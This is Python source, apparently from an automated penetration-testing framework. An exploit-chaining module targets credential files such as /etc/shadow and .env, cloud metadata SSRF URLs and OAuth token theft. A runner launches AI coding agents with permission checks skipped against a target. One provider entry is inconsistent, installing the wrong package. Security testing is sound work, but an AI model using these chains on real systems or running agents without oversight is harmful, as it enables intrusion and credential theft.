"../../../../config/secrets.yml",
"/proc/self/environ",
"../../../../application.properties",
"../../../../appsettings.json",
"../../../../web.config",
]
for config_path in config_files:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="lfi",
context={"config_file": config_path, "source": "lfi_chain"},
description=f"LFI chain: read {config_path}",
payload_hint=config_path,
))
return targets
def _extract_xss_chain(self, finding, recon) -> List[ChainableTarget]:
"""From reflected XSS: look for stored XSS and CORS chain opportunities."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# Look for form submission endpoints (potential stored XSS)
if recon and hasattr(recon, "forms"):
for form in getattr(recon, "forms", [])[:5]:
form_url = form.get("action", "") if isinstance(form, dict) else getattr(form, "action", "")
if form_url:
targets.append(ChainableTarget(
url=form_url,
param=param,
vuln_type="xss_stored",
context={"source": "xss_chain"},
description=f"XSS chain: stored XSS via form at {form_url}",
method="POST",
))
# Check for CORS misconfiguration chain
targets.append(ChainableTarget(
url=base + "/api/",
param="",
vuln_type="cors_misconfiguration",
context={"source": "xss_cors_chain"},
description="XSS+CORS chain: check CORS for session theft scenario",
))
return targets
def _extract_redirect_chain(self, finding, recon) -> List[ChainableTarget]:
"""From open redirect: chain to OAuth token theft."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# OAuth endpoints to test
oauth_paths = [
"/oauth/authorize", "/auth/authorize", "/oauth2/authorize",
"/connect/authorize", "/.well-known/openid-configuration",
"/api/oauth/callback",
]
for path in oauth_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="redirect_uri",
vuln_type="open_redirect",
context={"source": "redirect_oauth_chain"},
description=f"Redirect chain: OAuth token theft via {path}",
))
# SSRF via redirect
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="ssrf",
context={"source": "redirect_ssrf_chain"},
description="Redirect \u2192 SSRF chain",
))
return targets
def _extract_auth_chain(self, finding, recon) -> List[ChainableTarget]:
"""From default credentials: test all endpoints as authenticated user."""
targets = []
url = getattr(finding, "url", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# Privileged paths to test with obtained session
privileged_paths = [
"/admin", "/admin/users", "/admin/settings",
"/api/admin", "/api/users", "/api/v1/admin",
"/management", "/internal", "/debug",
]
for path in privileged_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="",
vuln_type="privilege_escalation",
context={"source": "auth_chain", "authenticated": True},
description=f"Auth chain: privilege escalation at {path}",
))
return targets
def _extract_admin_chain(self, finding, recon) -> List[ChainableTarget]:
"""From exposed admin panel: try default credentials and auth bypass."""
targets = []
url = getattr(finding, "url", "")
targets.append(ChainableTarget(
url=url,
param="",
vuln_type="default_credentials",
context={"source": "admin_chain"},
description=f"Admin chain: default credentials at {url}",
))
targets.append(ChainableTarget(
url=url,
param="",
vuln_type="auth_bypass",
context={"source": "admin_chain"},
description=f"Admin chain: auth bypass at {url}",
))
return targets
def _extract_subdomain_targets(self, finding, recon) -> List[ChainableTarget]:
"""From subdomain discovery: add as new attack targets."""
targets = []
evidence = getattr(finding, "evidence", "")
# Extract subdomains from evidence
subdomain_pattern = r'(?:https?://)?([a-zA-Z0-9][-a-zA-Z0-9]*\.[-a-zA-Z0-9.]+)'
found_domains = set(re.findall(subdomain_pattern, evidence))
for domain in list(found_domains)[:5]:
if not domain.startswith("http"):
domain_url = f"https://{domain}"
else:
domain_url = domain
targets.append(ChainableTarget(
url=domain_url,
param="",
vuln_type="xss_reflected",
context={"source": "subdomain_chain"},
description=f"Subdomain chain: test {domain}",
priority=3,
))
return targets
# \u2500\u2500\u2500 AI Correlation \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
async def ai_correlate(self, findings: List[Any], llm=None) -> List[Dict]:
"""AI-driven correlation of multiple findings into attack chains.
Analyzes all findings together to identify multi-step attack scenarios.
"""
llm = llm or self.llm
if not llm or not hasattr(llm, "generate"):
return []
if len(findings) < 2:
return []
try:
findings_summary = []
for f in findings[:20]:
findings_summary.append(
f"- {getattr(f, 'vulnerability_type', '?')}: "
f"{getattr(f, 'url', '?')} "
f"(param: {getattr(f, 'parameter', '?')}, "
f"confidence: {getattr(f, 'confidence_score', '?')})"
)
prompt = f"""Analyze these confirmed vulnerability findings for potential exploit chains.
FINDINGS:
{chr(10).join(findings_summary)}
For each chain you identify, describe:
1. The attack scenario (2-3 sentences)
2. Which findings are linked
3. The impact if chained together
4. Priority (critical/high/medium)
Return ONLY realistic chains where one finding directly enables or amplifies another.
If no meaningful chains exist, say "No chains identified."
Format each chain as: CHAIN: [scenario] | FINDINGS: [types] | IMPACT: [impact] | PRIORITY: [level]"""
result = await llm.generate(prompt)
if not result:
return []
# Parse chains
chains = []
for line in result.strip().split("\n"):
if line.startswith("CHAIN:"):
parts = line.split("|")
chain = {
"scenario": parts[0].replace("CHAIN:", "").strip() if len(parts) > 0 else "",
"findings": parts[1].replace("FINDINGS:", "").strip() if len(parts) > 1 else "",
"impact": parts[2].replace("IMPACT:", "").strip() if len(parts) > 2 else "",
"priority": parts[3].replace("PRIORITY:", "").strip() if len(parts) > 3 else "medium",
}
chains.append(chain)
return chains
except Exception as e:
logger.debug(f"AI chain correlation failed: {e}")
return []
# \u2500\u2500\u2500 Reporting \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
def get_attack_graph(self) -> Dict[str, List[str]]:
"""Get the attack chain graph."""
return dict(self._chain_graph)
def get_chain_stats(self) -> Dict:
"""Get chain statistics for reporting."""
return {
"total_chains_generated": self._total_chains,
"graph_nodes": len(self._chain_graph),
"chain_findings": len(self._chain_findings),
}
# ── AI-Driven Chain Discovery (Phase 4 Extension) ──────────────────
async def ai_discover_chains(
self,
findings: List[Any],
recon: Any = None,
llm=None,
budget=None,
) -> List[Dict]:
"""Use AI to discover non-obvious exploit chains.
Goes beyond rule-based chaining to identify multi-step
attack paths that require reasoning about the application.
"""
llm = llm or self.llm
if not llm or not hasattr(llm, "generate"):
return []
if len(findings) < 2:
return []
if budget and not budget.can_spend("analysis", 800):
return []
try:
findings_detail = []
for f in findings[:25]:
findings_detail.append({
"type": getattr(f, "vulnerability_type", ""),
"url": getattr(f, "affected_endpoint", getattr(f, "url", "")),
"param": getattr(f, "parameter", ""),
"confidence": getattr(f, "confidence_score", 0),
"evidence_snippet": str(getattr(f, "evidence", ""))[:150],
})
tech_info = ""
if recon:
techs = getattr(recon, "technologies", [])
if techs:
tech_info = f"\nDETECTED TECHNOLOGIES: {', '.join(techs[:10])}"
prompt = f"""You are an expert penetration tester analyzing confirmed findings for multi-step attack chains.
CONFIRMED FINDINGS:
{chr(10).join(f" {i+1}. [{f['type']}] {f['url']} (param: {f['param']}, confidence: {f['confidence']})" for i, f in enumerate(findings_detail))}
{tech_info}
Identify REALISTIC multi-step attack chains where one finding DIRECTLY enables exploiting another.
For each chain:
1. List the steps (which findings connect and how)
2. The final impact (what an attacker achieves)
3. Required conditions (what must be true)
4. Priority: critical/high/medium
IMPORTANT: Only propose chains where there is a CLEAR causal link between steps.
Do NOT invent chains that are merely thematic groupings.
Format each chain as:
CHAIN: [step1 type] -> [step2 type] -> ... | IMPACT: [final impact] | STEPS: [brief description of each step] | PRIORITY: [level]"""
result = await llm.generate(prompt)
if budget:
budget.record("analysis", 800, "ai_chain_discovery")
if not result:
return []
chains = []
for line in result.strip().split("\n"):
line = line.strip()
if not line.startswith("CHAIN:"):
continue
parts = line.split("|")
chain = {
"chain": parts[0].replace("CHAIN:", "").strip() if len(parts) > 0 else "",
"impact": "",
"steps": "",
"priority": "medium",
}
for part in parts[1:]:
part = part.strip()
if part.startswith("IMPACT:"):
chain["impact"] = part.replace("IMPACT:", "").strip()
elif part.startswith("STEPS:"):
chain["steps"] = part.replace("STEPS:", "").strip()
elif part.startswith("PRIORITY:"):
chain["priority"] = part.replace("PRIORITY:", "").strip().lower()
if chain["chain"]:
chains.append(chain)
logger.info(f"AI chain discovery: found {len(chains)} chains")
return chains
except Exception as e:
logger.debug(f"AI chain discovery failed: {e}")
return []
async def execute_chain(
self,
chain_targets: List[ChainableTarget],
test_fn,
) -> Dict:
"""Attempt to execute a multi-step exploit chain.
Args:
chain_targets: Ordered list of chain targets (step 1, 2, ...)
test_fn: Async callable(url, param, vuln_type, payload_hint) -> Finding or None
Returns:
Dict with chain execution results.
"""
results = {
"steps_total": len(chain_targets),
"steps_completed": 0,
"steps_succeeded": 0,
"chain_complete": False,
"findings": [],
"error": None,
}
prev_result = None
for i, target in enumerate(chain_targets):
try:
# Pass context from previous step
if prev_result and hasattr(target, "context"):
target.context["prev_step_result"] = str(prev_result)[:500]
finding = await test_fn(
target.url,
target.param,
target.vuln_type,
target.payload_hint,
)
results["steps_completed"] += 1
if finding:
results["steps_succeeded"] += 1
results["findings"].append(finding)
prev_result = finding
# Mark finding as part of chain
if hasattr(finding, "_chain_depth"):
finding._chain_depth = target.chain_depth
else:
# Chain broken — stop here
logger.debug(
f"Chain broken at step {i+1}/{len(chain_targets)}: "
f"{target.vuln_type} on {target.url}"
)
break
except Exception as e:
results["error"] = str(e)
logger.debug(f"Chain execution error at step {i+1}: {e}")
break
results["chain_complete"] = (
results["steps_succeeded"] == results["steps_total"]
)
return results
def eager_chain_targets(self, signal: Dict) -> List[ChainableTarget]:
"""Generate chain targets from intermediate signals (before full confirmation).
Called DURING testing when a single signal is detected but before
the full validation pipeline confirms it. Enables faster chain discovery.
Args:
signal: Dict with keys: vuln_type, url, param, status, evidence_snippet
Returns:
List of high-priority chain targets to test immediately.
"""
vuln_type = signal.get("vuln_type", "")
url = signal.get("url", "")
param = signal.get("param", "")
evidence = signal.get("evidence_snippet", "")
targets = []
# SSRF signal → immediately try cloud metadata
if vuln_type in ("ssrf", "ssrf_cloud"):
metadata_urls = [
"http://169.254.169.254/latest/meta-data/",
"http://metadata.google.internal/computeMetadata/v1/",
"http://169.254.169.254/metadata/instance",
]
for meta_url in metadata_urls:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="ssrf_cloud",
payload_hint=meta_url,
priority=1,
description=f"Eager: SSRF → cloud metadata ({meta_url})",
context={"source": "eager_chain", "target_url": meta_url},
))
# SQLi signal → immediately try UNION-based extraction
elif vuln_type.startswith("sqli"):
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="sqli_union",
priority=1,
description="Eager: SQLi → UNION extraction",
context={"source": "eager_chain", "db_evidence": evidence[:200]},
))
# LFI signal → immediately try sensitive files
elif vuln_type in ("lfi", "path_traversal", "arbitrary_file_read"):
sensitive_files = [
"../../../../.env",
"/etc/shadow",
"/proc/self/environ",
]
for fpath in sensitive_files:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="lfi",
payload_hint=fpath,
priority=1,
description=f"Eager: LFI → {fpath}",
context={"source": "eager_chain"},
))
# Info disclosure → auth chain
elif vuln_type == "information_disclosure":
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
targets.append(ChainableTarget(
url=f"{base}/admin",
param="",
vuln_type="auth_bypass",
priority=2,
description="Eager: Info disclosure → admin auth bypass",
context={"source": "eager_chain"},
))
return targets
@@ -1,123 +0,0 @@
"""
NeuroSploit v3 - Scan Checkpoint Manager
Save and restore agent state to JSON for crash-resilient session persistence.
Checkpoints are stored in data/checkpoints/{scan_id}.json.
"""
import json
import logging
import os
import time
from pathlib import Path
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
CHECKPOINT_DIR = Path(__file__).parent.parent.parent / "data" / "checkpoints"
class CheckpointManager:
"""Manages save/restore of agent scan state to disk."""
def __init__(self, scan_id: str):
self.scan_id = scan_id
self._filepath = CHECKPOINT_DIR / f"{scan_id}.json"
CHECKPOINT_DIR.mkdir(parents=True, exist_ok=True)
def save(self, state: Dict[str, Any]) -> bool:
"""Atomically save checkpoint state to disk.
State typically includes:
- target, mode, scan_type
- progress, phase
- recon_data (endpoints, tech_stack)
- findings (serialized)
- test_targets (serialized)
- junior_tested_types
- completed_vuln_types
- timestamp
"""
try:
state["_checkpoint_version"] = 1
state["_scan_id"] = self.scan_id
state["_timestamp"] = time.time()
tmp_path = self._filepath.with_suffix(".tmp")
with open(tmp_path, "w") as f:
json.dump(state, f, indent=2, default=str)
tmp_path.rename(self._filepath)
logger.debug(f"Checkpoint saved for scan {self.scan_id}")
return True
except Exception as e:
logger.warning(f"Failed to save checkpoint for {self.scan_id}: {e}")
return False
def load(self) -> Optional[Dict[str, Any]]:
"""Load checkpoint from disk, returns None if not found or corrupt."""
if not self._filepath.exists():
return None
try:
with open(self._filepath) as f:
data = json.load(f)
if data.get("_scan_id") != self.scan_id:
logger.warning(f"Checkpoint scan_id mismatch: {data.get('_scan_id')} != {self.scan_id}")
return None
logger.info(f"Checkpoint loaded for scan {self.scan_id} (saved at {data.get('_timestamp', '?')})")
return data
except Exception as e:
logger.warning(f"Failed to load checkpoint for {self.scan_id}: {e}")
return None
def delete(self):
"""Remove checkpoint file after successful completion."""
try:
if self._filepath.exists():
self._filepath.unlink()
logger.debug(f"Checkpoint deleted for scan {self.scan_id}")
except Exception as e:
logger.warning(f"Failed to delete checkpoint for {self.scan_id}: {e}")
@property
def exists(self) -> bool:
"""Check if a checkpoint exists for this scan."""
return self._filepath.exists()
@staticmethod
def list_checkpoints() -> List[Dict[str, Any]]:
"""List all available checkpoints for the resume UI."""
CHECKPOINT_DIR.mkdir(parents=True, exist_ok=True)
checkpoints = []
for f in CHECKPOINT_DIR.glob("*.json"):
try:
with open(f) as fp:
data = json.load(fp)
checkpoints.append({
"scan_id": data.get("_scan_id", f.stem),
"target": data.get("target", "unknown"),
"progress": data.get("progress", 0),
"phase": data.get("phase", "unknown"),
"timestamp": data.get("_timestamp", 0),
"findings_count": len(data.get("findings", [])),
})
except Exception:
continue
# Sort by most recent first
checkpoints.sort(key=lambda c: c["timestamp"], reverse=True)
return checkpoints
@staticmethod
def cleanup_old(max_age_hours: int = 72):
"""Remove checkpoints older than max_age_hours."""
CHECKPOINT_DIR.mkdir(parents=True, exist_ok=True)
cutoff = time.time() - (max_age_hours * 3600)
removed = 0
for f in CHECKPOINT_DIR.glob("*.json"):
try:
if f.stat().st_mtime < cutoff:
f.unlink()
removed += 1
except Exception:
continue
if removed:
logger.info(f"Cleaned up {removed} old checkpoints")
@@ -1,721 +0,0 @@
"""
CLI Agent Runner - Executes AI CLI tools (Claude Code, Gemini CLI, Codex CLI) inside
Kali Linux Docker containers for autonomous penetration testing.
Architecture:
1. Detects OAuth token from SmartRouter
2. Creates per-scan Kali container via ContainerPool
3. Installs Node.js + selected CLI tool
4. Uploads methodology file + instructions
5. Runs CLI in non-interactive mode (background process)
6. Polls output file, extracts findings in real-time
7. Findings flow through existing validation pipeline
Follows ResearcherAgent pattern (lifecycle, callbacks, sandbox integration).
"""
import os
import time
import asyncio
import logging
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple, Callable, Any
logger = logging.getLogger(__name__)
# ═══════════════════════════════════════════════════════════════════════════════
# CLI Provider Definitions
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class CLIProvider:
"""Definition of a CLI tool that can run inside the Kali container."""
id: str
name: str
npm_package: str
command: str
auth_env: str # Env var for the OAuth/API token
non_interactive_flags: str # Flags for non-interactive mode
model_flag: str # Flag to specify model
needs_nodejs: bool = True # Most CLI tools are npm-based
install_cmd: Optional[str] = None # Override for non-npm install
prompt_method: str = "stdin" # "stdin", "flag", "file"
extra_setup: Optional[str] = None # Extra setup commands after install
CLI_PROVIDERS: Dict[str, CLIProvider] = {
"claude_code": CLIProvider(
id="claude_code",
name="Claude Code",
npm_package="@anthropic-ai/claude-code",
command="claude",
auth_env="ANTHROPIC_API_KEY",
non_interactive_flags="--print --dangerously-skip-permissions --verbose",
model_flag="--model",
prompt_method="stdin",
),
"gemini_cli": CLIProvider(
id="gemini_cli",
name="Gemini CLI",
npm_package="@anthropic-ai/claude-code", # Gemini CLI uses same approach
command="gemini",
auth_env="GEMINI_API_KEY",
non_interactive_flags="--sandbox",
model_flag="--model",
prompt_method="stdin",
install_cmd="npm install -g @anthropic-ai/claude-code", # fallback to claude if gemini CLI not available
),
"codex_cli": CLIProvider(
id="codex_cli",
name="OpenAI Codex CLI",
npm_package="@openai/codex",
command="codex",
auth_env="OPENAI_API_KEY",
non_interactive_flags="--full-auto --quiet",
model_flag="--model",
prompt_method="stdin",
),
}
# ═══════════════════════════════════════════════════════════════════════════════
# Result Data Classes
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class CLIAgentResult:
"""Result of a CLI agent run."""
findings: List[Dict] = field(default_factory=list)
raw_output: str = ""
duration: float = 0.0
exit_code: int = -1
tools_used: List[str] = field(default_factory=list)
phases_completed: List[str] = field(default_factory=list)
total_output_lines: int = 0
cli_provider: str = ""
error: Optional[str] = None
# ═══════════════════════════════════════════════════════════════════════════════
# CLI Agent Runner
# ═══════════════════════════════════════════════════════════════════════════════
class CLIAgentRunner:
"""
Runs an AI CLI tool inside a Kali Linux container for penetration testing.
Lifecycle:
runner = CLIAgentRunner(...)
ok, msg = await runner.initialize() # Container + CLI install
result = await runner.run() # Execute + poll findings
await runner.shutdown() # Cleanup
"""
WORK_DIR = "/opt/pentest"
OUTPUT_LOG = "/opt/pentest/output.log"
FINDINGS_LOG = "/opt/pentest/findings.jsonl"
def __init__(
self,
scan_id: str,
target: str,
cli_provider_id: str = "claude_code",
methodology_path: Optional[str] = None,
preferred_model: Optional[str] = None,
log_callback: Optional[Callable] = None,
progress_callback: Optional[Callable] = None,
finding_callback: Optional[Callable] = None,
auth_headers: Optional[Dict] = None,
max_runtime: Optional[int] = None,
token_budget: Optional[Any] = None,
llm: Optional[Any] = None,
):
self.scan_id = scan_id
self.target = target
self.cli_provider_id = cli_provider_id
self.methodology_path = methodology_path or os.getenv(
"METHODOLOGY_FILE", "/opt/Prompts-PenTest/pentestcompleto_en.md"
)
self.preferred_model = preferred_model
self.log_callback = log_callback
self.progress_callback = progress_callback
self.finding_callback = finding_callback
self.auth_headers = auth_headers or {}
self.token_budget = token_budget
self.llm = llm
# Runtime config
self.max_runtime = max_runtime or int(os.getenv("CLI_AGENT_MAX_RUNTIME", "1800"))
self.poll_interval = 3 # seconds between output checks
self.stale_timeout = 300 # kill if no new output for 5 min
self.ai_extract_interval = 300 # AI extraction every 5 min
# State
self._sandbox = None
self._provider: Optional[CLIProvider] = None
self._oauth_token: Optional[str] = None
self._cli_pid: Optional[str] = None
self._cancelled = False
self._output_offset = 0
self._last_output_time = 0.0
self._start_time = 0.0
self._all_output: List[str] = []
# Parser
from backend.core.cli_output_parser import CLIOutputParser
self._parser = CLIOutputParser()
# Recon data (set by autonomous_agent before run, for auto_pentest integration)
self.recon_data: Optional[Dict] = None
self.existing_findings: Optional[List] = None
# ── Logging Helpers ────────────────────────────────────────────────────
async def _log(self, level: str, message: str):
if self.log_callback:
try:
await self.log_callback(level, f"[CLI-AGENT] {message}")
except Exception:
pass
logger.log(
getattr(logging, level.upper(), logging.INFO),
f"[CLI-AGENT] {message}"
)
async def _progress(self, pct: int, phase: str):
if self.progress_callback:
try:
await self.progress_callback(pct, phase)
except Exception:
pass
# ── Lifecycle ──────────────────────────────────────────────────────────
async def initialize(self) -> Tuple[bool, str]:
"""Initialize: create container, install CLI, upload files."""
try:
# 1. Resolve provider
self._provider = CLI_PROVIDERS.get(self.cli_provider_id)
if not self._provider:
return False, f"Unknown CLI provider: {self.cli_provider_id}"
await self._log("info", f"Provider: {self._provider.name}")
# 2. Get OAuth token from SmartRouter
self._oauth_token = self._get_oauth_token(self.cli_provider_id)
if not self._oauth_token:
# Try API key from env
env_key = self._provider.auth_env
self._oauth_token = os.getenv(env_key, "")
if not self._oauth_token:
return False, (
f"No OAuth token or API key found for {self._provider.name}. "
f"Connect via Providers page or set {env_key} in .env"
)
await self._log("info", "Using API key from environment")
else:
await self._log("info", "Using OAuth token from SmartRouter")
# 3. Create Kali sandbox container
await self._log("info", "Creating Kali sandbox container...")
try:
from core.container_pool import get_pool
pool = get_pool()
self._sandbox = await pool.get_or_create(
scan_id=f"cli-agent-{self.scan_id}",
enable_vpn=False,
)
await self._log("info", f"Container ready: {getattr(self._sandbox, 'container_name', 'kali')}")
except Exception as e:
return False, f"Failed to create Kali container: {e}"
# 4. Install Node.js + CLI tool
await self._log("info", "Installing Node.js...")
await self._progress(2, "Installing Node.js")
result = await self._sandbox.execute_raw(
"which node > /dev/null 2>&1 && echo 'exists' || "
"(apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq nodejs npm > /dev/null 2>&1 && echo 'installed')",
timeout=120,
)
if "exists" in result.stdout:
await self._log("info", "Node.js already available")
elif "installed" in result.stdout:
await self._log("info", "Node.js installed successfully")
else:
return False, f"Failed to install Node.js: {result.stderr[:200]}"
await self._log("info", f"Installing {self._provider.name} CLI...")
await self._progress(4, f"Installing {self._provider.name}")
install_cmd = self._provider.install_cmd or f"npm install -g {self._provider.npm_package}"
result = await self._sandbox.execute_raw(install_cmd, timeout=180)
# Verify CLI is available
verify = await self._sandbox.execute_raw(f"which {self._provider.command}", timeout=10)
if verify.exit_code != 0:
# Try npx fallback
verify2 = await self._sandbox.execute_raw(
f"npx --yes {self._provider.npm_package} --version", timeout=60
)
if verify2.exit_code != 0:
return False, f"CLI tool '{self._provider.command}' not found after installation"
await self._log("info", f"CLI available via npx")
else:
await self._log("info", f"CLI installed: {verify.stdout.strip()}")
# 5. Extra setup if needed
if self._provider.extra_setup:
await self._sandbox.execute_raw(self._provider.extra_setup, timeout=60)
# 6. Upload files
await self._log("info", "Uploading methodology and instructions...")
await self._progress(6, "Uploading files")
await self._upload_files()
# 7. Inject OAuth token as env var
await self._inject_token()
await self._log("info", "Initialization complete")
await self._progress(8, "Ready to start")
return True, "CLI Agent initialized successfully"
except Exception as e:
logger.exception("[CLI-AGENT] Initialization failed")
return False, f"Initialization error: {e}"
async def run(self) -> CLIAgentResult:
"""Execute the CLI agent and poll for findings."""
if not self._sandbox or not self._provider:
return CLIAgentResult(error="Not initialized")
self._start_time = time.time()
self._last_output_time = self._start_time
try:
# Start CLI process
await self._log("info", f"Starting {self._provider.name} against {self.target}")
await self._progress(10, f"{self._provider.name} starting")
pid = await self._start_cli_process()
if not pid:
return CLIAgentResult(error="Failed to start CLI process")
self._cli_pid = pid
await self._log("info", f"CLI process started (PID: {pid})")
# Poll output loop
result = await self._poll_output_loop()
return result
except asyncio.CancelledError:
await self._log("warning", "Run cancelled")
await self._kill_cli_process()
return CLIAgentResult(error="Cancelled")
except Exception as e:
logger.exception("[CLI-AGENT] Run failed")
await self._log("error", f"Run error: {e}")
return CLIAgentResult(error=str(e))
async def shutdown(self):
"""Cleanup: kill CLI process and destroy container."""
await self._kill_cli_process()
if self._sandbox:
try:
from core.container_pool import get_pool
await get_pool().destroy(f"cli-agent-{self.scan_id}")
await self._log("info", "Container destroyed")
except Exception as e:
logger.warning(f"[CLI-AGENT] Cleanup error: {e}")
self._sandbox = None
def cancel(self):
"""Signal cancellation."""
self._cancelled = True
# ── Container Setup (Private) ──────────────────────────────────────────
def _get_oauth_token(self, provider_id: str) -> Optional[str]:
"""Retrieve OAuth token from SmartRouter ProviderRegistry."""
try:
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
return None
accounts = registry.get_active_accounts(provider_id)
if not accounts:
return None
# Use first active account
account = accounts[0]
credential = registry.get_credential(account.id)
if credential:
logger.info(f"[CLI-AGENT] Got OAuth token for {provider_id} (account: {account.label})")
return credential
return None
except Exception as e:
logger.debug(f"[CLI-AGENT] SmartRouter token retrieval failed: {e}")
return None
async def _upload_files(self):
"""Upload methodology file, instructions, and CLAUDE.md to container."""
from backend.core.cli_instructions_builder import (
build_instructions, build_claude_md, load_methodology
)
# Create work directory
await self._sandbox.execute_raw(f"mkdir -p {self.WORK_DIR}", timeout=5)
# Load and upload methodology
methodology = load_methodology(self.methodology_path)
if methodology:
await self._sandbox.upload_file(
methodology.encode("utf-8"),
f"{self.WORK_DIR}/methodology.md",
)
await self._log("info", f"Uploaded methodology ({len(methodology)} chars)")
else:
await self._log("warning", "No methodology file available")
# Build and upload instructions
extra_context = None
if self.recon_data:
# Include recon context if available (auto_pentest integration)
endpoints = self.recon_data.get("endpoints", [])[:20]
techs = self.recon_data.get("technologies", [])
extra_parts = []
if techs:
extra_parts.append(f"Detected technologies: {', '.join(techs)}")
if endpoints:
ep_list = "\n".join(
f"- {e.get('method', 'GET')} {e.get('url', '')}" for e in endpoints[:15]
)
extra_parts.append(f"Discovered endpoints:\n{ep_list}")
if self.existing_findings:
extra_parts.append(
f"Already found {len(self.existing_findings)} vulnerabilities. "
f"Focus on areas not yet tested."
)
extra_context = "\n".join(extra_parts)
instructions = build_instructions(
target=self.target,
auth_headers=self.auth_headers if self.auth_headers else None,
methodology_path=f"{self.WORK_DIR}/methodology.md",
extra_context=extra_context,
)
await self._sandbox.upload_file(
instructions.encode("utf-8"),
f"{self.WORK_DIR}/instructions.md",
)
# Build and upload CLAUDE.md (auto-read by Claude Code)
claude_md = build_claude_md(
target=self.target,
auth_headers=self.auth_headers if self.auth_headers else None,
)
await self._sandbox.upload_file(
claude_md.encode("utf-8"),
f"{self.WORK_DIR}/CLAUDE.md",
)
async def _inject_token(self):
"""Inject OAuth/API token as environment variable in container."""
if not self._oauth_token or not self._provider:
return
# Write to .bashrc so it's available to background processes
env_var = self._provider.auth_env
# Use base64 encoding to safely pass token with special chars
import base64
encoded = base64.b64encode(self._oauth_token.encode()).decode()
await self._sandbox.execute_raw(
f'echo \'export {env_var}="$(echo {encoded} | base64 -d)"\' >> /root/.bashrc',
timeout=5,
)
# Also write to a env file that can be sourced
await self._sandbox.execute_raw(
f'echo \'export {env_var}="$(echo {encoded} | base64 -d)"\' > {self.WORK_DIR}/.env',
timeout=5,
)
await self._log("info", f"Token injected as ${env_var}")
# ── Execution (Private) ────────────────────────────────────────────────
async def _start_cli_process(self) -> Optional[str]:
"""Start the CLI tool as a background process in the container."""
provider = self._provider
if not provider:
return None
# Build model flag
model_part = ""
if self.preferred_model and provider.model_flag:
model_part = f"{provider.model_flag} {self.preferred_model}"
# Build the prompt - read instructions file
prompt_input = f"cat {self.WORK_DIR}/instructions.md"
# Build CLI command based on provider
if provider.id == "claude_code":
cli_cmd = (
f"cd {self.WORK_DIR} && "
f"source {self.WORK_DIR}/.env && "
f"{provider.command} {provider.non_interactive_flags} "
f"{model_part} "
f"\"$(cat {self.WORK_DIR}/instructions.md)\""
)
elif provider.id == "codex_cli":
cli_cmd = (
f"cd {self.WORK_DIR} && "
f"source {self.WORK_DIR}/.env && "
f"{provider.command} {provider.non_interactive_flags} "
f"{model_part} "
f"\"$(cat {self.WORK_DIR}/instructions.md)\""
)
else:
# Generic fallback
cli_cmd = (
f"cd {self.WORK_DIR} && "
f"source {self.WORK_DIR}/.env && "
f"{provider.command} {provider.non_interactive_flags} "
f"{model_part} "
f"\"$(cat {self.WORK_DIR}/instructions.md)\""
)
# Run as background process with output capture
full_cmd = (
f"nohup bash -c '{cli_cmd}' "
f"> {self.OUTPUT_LOG} 2>&1 & echo $!"
)
result = await self._sandbox.execute_raw(full_cmd, timeout=15)
pid = result.stdout.strip().split('\n')[-1].strip()
if pid and pid.isdigit():
return pid
await self._log("error", f"Failed to get PID. stdout: {result.stdout[:200]}, stderr: {result.stderr[:200]}")
return None
async def _poll_output_loop(self) -> CLIAgentResult:
"""Main polling loop: read output, parse findings, check process status."""
last_ai_extract = time.time()
all_findings: List[Dict] = []
raw_output_parts: List[str] = []
while not self._cancelled:
elapsed = time.time() - self._start_time
# Check max runtime
if elapsed > self.max_runtime:
await self._log("warning", f"Max runtime ({self.max_runtime}s) exceeded, stopping")
await self._kill_cli_process()
break
# Read new output
new_text = await self._read_new_output()
if new_text:
self._last_output_time = time.time()
raw_output_parts.append(new_text)
# Log interesting lines (not every line to avoid spam)
for line in new_text.split('\n'):
line_s = line.strip()
if not line_s:
continue
# Always log phase markers and findings
if any(kw in line_s for kw in [
'[PHASE]', '[COMPLETE]', '[FINDING]', '[VULNERABILITY]',
'FINDING_START', 'FINDING_END', '[critical]', '[high]',
'Confirmed', 'Vulnerability found',
]):
await self._log("info", line_s[:300])
elif len(self._all_output) % 20 == 0:
# Log every 20th line as debug
await self._log("debug", line_s[:200])
# Parse findings from new output
parsed = self._parser.parse_chunk(new_text)
for finding in parsed:
finding_dict = finding.to_dict()
finding_dict["affected_endpoint"] = finding_dict.get("affected_endpoint") or self.target
all_findings.append(finding_dict)
# Emit finding through callback
if self.finding_callback:
try:
await self.finding_callback(finding_dict)
except Exception as e:
logger.debug(f"Finding callback error: {e}")
await self._log("success",
f"Finding: {finding.title} [{finding.severity.upper()}]")
